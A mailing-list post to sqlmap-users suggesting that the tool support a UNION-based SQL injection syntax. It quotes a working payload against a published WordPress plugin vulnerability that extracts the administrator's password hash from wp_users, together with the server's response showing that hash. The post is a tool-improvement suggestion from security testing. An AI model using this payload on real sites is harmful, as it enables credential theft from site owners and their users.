Hello!

Playing around with the following vulnerability:

http://www.exploit-db.com/exploits/35505/


Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
(SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
result in a response from the server with the hash of the first user:

1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
(SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]


However, sqlmap only finds a time-based injection. Looking at sqlmap
through Burp, I do see sqlmap doesn't try an injection syntax like the one
used in the PoC. It may be useful to add a syntax of UNION (SELECT
CONCAT(blah, blah, blah) FROM blah).

Just a thought!


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
